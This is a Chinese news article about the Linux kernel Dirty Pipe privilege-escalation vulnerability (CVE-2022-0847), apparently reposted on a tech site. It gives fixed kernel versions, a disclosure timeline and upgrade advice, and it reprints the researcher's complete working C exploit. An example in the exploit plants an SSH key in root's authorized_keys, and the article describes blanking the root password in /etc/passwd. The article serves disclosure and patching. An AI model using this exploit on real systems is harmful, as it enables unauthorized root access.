51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
视频课免费课排行榜短视频直播课软考学堂
全部课程软考华为认证厂商认证IT技术PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

Linux 内核最新高危提权漏洞:脏管道 (Dirty Pipe)

作者:局长
安全 漏洞
来自 CM4all 的安全研究员 Max Kellermann 披露了一个 Linux 内核的高危提权漏洞:脏管道 (Dirty Pipe)。漏洞编号为 CVE-2022-0847。

来自 CM4all 的安全研究员 Max Kellermann 披露了一个 Linux 内核的高危提权漏洞:脏管道 (Dirty Pipe)。漏洞编号为 CVE-2022-0847。

据介绍,此漏洞自 5.8 版本起就已存在。非 root 用户通过注入和覆盖只读文件中的数据,从而获得 root 权限。因为非特权进程可以将代码注入 root 进程。

Max 表示,“脏管道”漏洞与几年前的“脏牛”类似,所以采用了相似的名字,不过前者更容易被利用。此外,该漏洞目前已被黑客利用,研究人员建议尽快升级版本,Linux 5.16.11、5.15.25 和 5.10.102 均已修复了此漏洞。

Max 在文章中提供了漏洞 PoC。

/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2022 CM4all GmbH / IONOS SE
 *
 * author: Max Kellermann <max.kellermann@ionos.com>
 *
 * Proof-of-concept exploit for the Dirty Pipe
 * vulnerability (CVE-2022-0847) caused by an uninitialized
 * "pipe_buffer.flags" variable.  It demonstrates how to overwrite any
 * file contents in the page cache, even if the file is not permitted
 * to be written, immutable or on a read-only mount.
 *
 * This exploit requires Linux 5.8 or later; the code path was made
 * reachable by commit f6dd975583bd ("pipe: merge
 * anon_pipe_buf*_ops").  The commit did not introduce the bug, it was
 * there before, it just provided an easy way to exploit it.
 *
 * There are two major limitations of this exploit: the offset cannot
 * be on a page boundary (it needs to write one byte before the offset
 * to add a reference to this page to the pipe), and the write cannot
 * cross a page boundary.
 *
 * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
 *
 * Further explanation: https://dirtypipe.cm4all.com/
 */

#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

/**
 * Create a pipe where all "bufs" on the pipe_inode_info ring have the
 * PIPE_BUF_FLAG_CAN_MERGE flag set.
 */
static void prepare_pipe(int p[2])
{
  if (pipe(p)) abort();

  const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
  static char buffer[4096];

  /* fill the pipe completely; each pipe_buffer will now have
     the PIPE_BUF_FLAG_CAN_MERGE flag */
  for (unsigned r = pipe_size; r > 0;) {
    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    write(p[1], buffer, n);
    r -= n;
  }

  /* drain the pipe, freeing all pipe_buffer instances (but
     leaving the flags initialized) */
  for (unsigned r = pipe_size; r > 0;) {
    unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
    read(p[0], buffer, n);
    r -= n;
  }

  /* the pipe is now empty, and if somebody adds a new
     pipe_buffer without initializing its "flags", the buffer
     will be mergeable */
}

int main(int argc, char **argv)
{
  if (argc != 4) {
    fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATA\n", argv[0]);
    return EXIT_FAILURE;
  }

  /* dumb command-line argument parser */
  const char *const path = argv[1];
  loff_t offset = strtoul(argv[2], NULL, 0);
  const char *const data = argv[3];
  const size_t data_size = strlen(data);

  if (offset % PAGE_SIZE == 0) {
    fprintf(stderr, "Sorry, cannot start writing at a page boundary\n");
    return EXIT_FAILURE;
  }

  const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
  const loff_t end_offset = offset + (loff_t)data_size;
  if (end_offset > next_page) {
    fprintf(stderr, "Sorry, cannot write across a page boundary\n");
    return EXIT_FAILURE;
  }

  /* open the input file and validate the specified offset */
  const int fd = open(path, O_RDONLY); // yes, read-only! :-)
  if (fd < 0) {
    perror("open failed");
    return EXIT_FAILURE;
  }

  struct stat st;
  if (fstat(fd, &st)) {
    perror("stat failed");
    return EXIT_FAILURE;
  }

  if (offset > st.st_size) {
    fprintf(stderr, "Offset is not inside the file\n");
    return EXIT_FAILURE;
  }

  if (end_offset > st.st_size) {
    fprintf(stderr, "Sorry, cannot enlarge the file\n");
    return EXIT_FAILURE;
  }

  /* create the pipe with all flags initialized with
     PIPE_BUF_FLAG_CAN_MERGE */
  int p[2];
  prepare_pipe(p);

  /* splice one byte from before the specified offset into the
     pipe; this will add a reference to the page cache, but
     since copy_page_to_iter_pipe() does not initialize the
     "flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
  --offset;
  ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
  if (nbytes < 0) {
    perror("splice failed");
    return EXIT_FAILURE;
  }
  if (nbytes == 0) {
    fprintf(stderr, "short splice\n");
    return EXIT_FAILURE;
  }

  /* the following write will not create a new pipe_buffer, but
     will instead write into the page cache, because of the
     PIPE_BUF_FLAG_CAN_MERGE flag */
  nbytes = write(p[1], data, data_size);
  if (nbytes < 0) {
    perror("write failed");
    return EXIT_FAILURE;
  }
  if ((size_t)nbytes < data_size) {
    fprintf(stderr, "short write\n");
    return EXIT_FAILURE;
  }

  printf("It worked!\n");
  return EXIT_SUCCESS;
}
  • 1.
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25.
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
  • 55.
  • 56.
  • 57.
  • 58.
  • 59.
  • 60.
  • 61.
  • 62.
  • 63.
  • 64.
  • 65.
  • 66.
  • 67.
  • 68.
  • 69.
  • 70.
  • 71.
  • 72.
  • 73.
  • 74.
  • 75.
  • 76.
  • 77.
  • 78.
  • 79.
  • 80.
  • 81.
  • 82.
  • 83.
  • 84.
  • 85.
  • 86.
  • 87.
  • 88.
  • 89.
  • 90.
  • 91.
  • 92.
  • 93.
  • 94.
  • 95.
  • 96.
  • 97.
  • 98.
  • 99.
  • 100.
  • 101.
  • 102.
  • 103.
  • 104.
  • 105.
  • 106.
  • 107.
  • 108.
  • 109.
  • 110.
  • 111.
  • 112.
  • 113.
  • 114.
  • 115.
  • 116.
  • 117.
  • 118.
  • 119.
  • 120.
  • 121.
  • 122.
  • 123.
  • 124.
  • 125.
  • 126.
  • 127.
  • 128.
  • 129.
  • 130.
  • 131.
  • 132.
  • 133.
  • 134.
  • 135.
  • 136.
  • 137.
  • 138.
  • 139.
  • 140.
  • 141.
  • 142.
  • 143.
  • 144.
  • 145.
  • 146.
  • 147.
  • 148.
  • 149.
  • 150.
  • 151.
  • 152.
  • 153.
  • 154.
  • 155.
  • 156.

据介绍,本地用户可以将自己的数据注入敏感的只读文件,消除限制或修改配置以获得更高的权限。有研究人员通过利用该漏洞修改 /etc/passwd 文件进行了举例,修改后可直接取消 root 用户的密码,然后普通用户使用 su root 命令即可获得 root 账户的访问权限。还有研究人员发现,使用 /usr/bin/su 命令删除 /tmp/sh 中的 root shell 可以更容易获取 root 权限。

最后,建议各位检查所使用的 Linux 服务器的内核版本,若是 5.8 以上的版本请尽快升级。

脏管道 (Dirty Pipe) 漏洞时间线:

  • 2022-02-20:向 Linux 内核安全团队发送错误报告、漏洞利用和补丁
  • 2022-02-21:在 Google Pixel 6 上复现错误,并向 Android 安全团队发送错误报告
  • 2022-02-21: 按照 Linus Torvalds、Willy Tarreau 和 Al Viro 的建议,将补丁发送到 LKML(不含漏洞详细信息)
  • 2022-02-23:发布包含错误修复的 Linux 稳定版本 (5.16.11、5.15.25、5.10.102)
  • 2022-02-24:Google 将错误修复合并到 Android 内核
  • 2022-02-28:通知 linux-distros 邮件列表
  • 2022-03-07:公开披露

本文转自OSCHINA

本文标题:Linux 内核最新高危提权漏洞:脏管道 (Dirty Pipe)

本文地址:https://www.oschina.net/news/185559/linux-dirty-pipe-vulnerability

责任编辑:未丽燕 来源: 开源中国
脏管道Linux 内核漏洞
相关推荐
2022年Linux内核漏洞总结
本篇文章我们总结2022年以来Linux内核出现的严重安全漏洞,以供大家参考学习和修复。

2022-03-10 09:41:15

漏洞Linux内核
DRAM芯片内核漏洞解析
安全研究人员发现在英特尔PC上的Linux系统中可以利用某些种类的DDRDRAM芯片所存在的物理缺陷来获取系统最高权限。该技术被称为“Rowhammer”,其可使最近一代的DRAM芯片多次访问内存导致相邻行发生“位翻转”,并允许任何人改变计算机内存中的存储内容。

2015-03-13 10:06:55

详解Facebook最新高危XSS安全漏洞
攻击者能够利用这些XSS漏洞攻击数以百万计的Facebook用户,例如散播恶意软件、广告软件和间谍软件等等。拜这些高危跨站点脚本攻击漏洞所赐,Facebook用户可能受到钓鱼攻击并导致ID失窃。截至本月5号为止,这些漏洞尚未得到修复,这些高危漏洞已经对用户的隐私构成了高度的威胁。

2009-02-04 11:24:12

IIS最新高危漏洞POC及在线检测源码
远程执行代码漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys未正确分析经特殊设计的HTTP请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。

2015-04-16 15:14:54

OpenSSL最新高危漏洞(CVE-2015-1793)补丁发布
研究人员AdamLangleyDavidBenjamin(GoogleBoringSSL)近日发现了一枚新的OpenSSL严重安全漏洞。目前OpenSSL已发布了OpenSSL1.0.2b和OpenSSL1.0.1n两个版本的最新更新,修复了加密协议中的证书伪造问题。

2015-07-13 09:18:20

Linux再爆root帐号漏洞
系统安全高手DanRosenberg发布了一段C程序,这段200多行的程序利用了LinuxEconet协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升.

2010-12-10 15:23:49

Linux漏洞
Windows 11 高危漏洞:300 毫秒即可至管理员
该漏洞编号为CVE202524076,通过精密的DLL劫持技术利用Windows11“移动设备”功能的缺陷。

2025-04-18 10:17:47

最新高危木马“鬼影2”现身
木马的传播方式主要通过EMAIL,控制端将木马程序以附件的形式夹在邮件中发送出去,收信人只要打开附件系统就会感染木马;另一种是通过软件下载,一些非正规的网站以提供软件下载为名义,将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。因此,防范木马是一个比较困难的事情。

2011-03-21 10:46:04

Azure Functions 漏洞分析
AzureFunctions是一种无服务器解决方案,可以使用户减少代码编写、减少需要维护的基础结构并节省成本。

2021-05-01 20:52:30

漏洞网络安全网络攻击
msf漏洞利用总结
最近在重构安全体系,顺带对msf可以利用的漏洞进行了一些总结,快来看看吧。

2023-06-11 17:24:26

基于Windows 32k内核漏洞的攻防对抗
漏洞成功利用漏洞触发、漏洞利用这两大环节,而漏洞利用又有以下三个阶段,分别是堆喷射阶段、信息泄露阶段、代码执行阶段。下面将结合CVE20190808、CVE20211732进行详细阐述。

2023-09-11 06:59:59

Android Superuser 漏洞分析
近日,国外安全研究人员揭露多款Android平台下的授权应用管理软件存在3个安全漏洞,利用漏洞可进行root提权。

2013-11-29 15:34:00

Linux内核连爆高危漏洞
Linux内核漏洞最近几乎是一月一爆,在8月15号才爆了一个几乎通杀所有版本所有内核所有架构的内核漏洞;今天在学生返校的大喜日子里,竟然又爆了一个......

2009-09-02 18:33:45

黑客再爆Linux内核高危漏洞 可以攻击所有Linux系统
国外黑客taviso和julien公开了可以攻击所有新旧Linux系统的一个漏洞,包括但不限于RedHat,CentOS,Suse,Debian,Ubuntu,Slackware,Mandriva,Gentoo及其衍生系统。

2009-08-17 08:47:07

Linux内核20天内连爆两高危漏洞
Linux内核漏洞最近几乎是一月一爆,在8月15号才爆了一个几乎通杀所有版本所有内核所有架构的内核漏洞;今天在学生返校的大喜日子里,竟然又爆了一个......

2009-09-01 09:31:32

Struts2高危漏洞最新分析
日前,ApacheStruts2发布漏洞公告,称其Struts2Web应用框架存在一个可以远程执行任意命令的高危漏洞。利用该漏洞,黑客可轻易攻陷网站服务器,获取网站注册用户的帐号密码和个人资料,而Struts2框架正广泛应用在国内大量知名网站上,包括各大门户、电商、银行等官网也受其影响。

2013-07-18 15:09:27

Linux爆本地漏洞 请立即更新udev程序
缓冲区溢出本地提权立即处理[msg]Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。(2.4内核系统不受影响)

2009-04-24 14:08:25

Linux爆本地漏洞 请立即更新udev程序
Linux的udev程序再爆本地提权漏洞,本地用户可以轻易获得root权限,请立即更新udev程序。

2009-04-24 14:34:51

Metasploit Framework 4.17.0 本地漏洞分析
MetasploitFramework4.17.0(Windows)通过WindowsXP安装Metasploit框架时,存在本地提权漏洞。

2020-10-06 13:58:25

漏洞
Windows Search Indexer 本地漏洞分析
WindowsService中最近发生的大多数LPE漏洞都是逻辑漏洞。通过这种方式,对WindowsSearchIndexer的内存损坏漏洞进行分析非常有趣。因此,此后的WindowsService中很可能会出现这种内存损坏漏洞。

2020-11-16 10:55:41

Windows
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服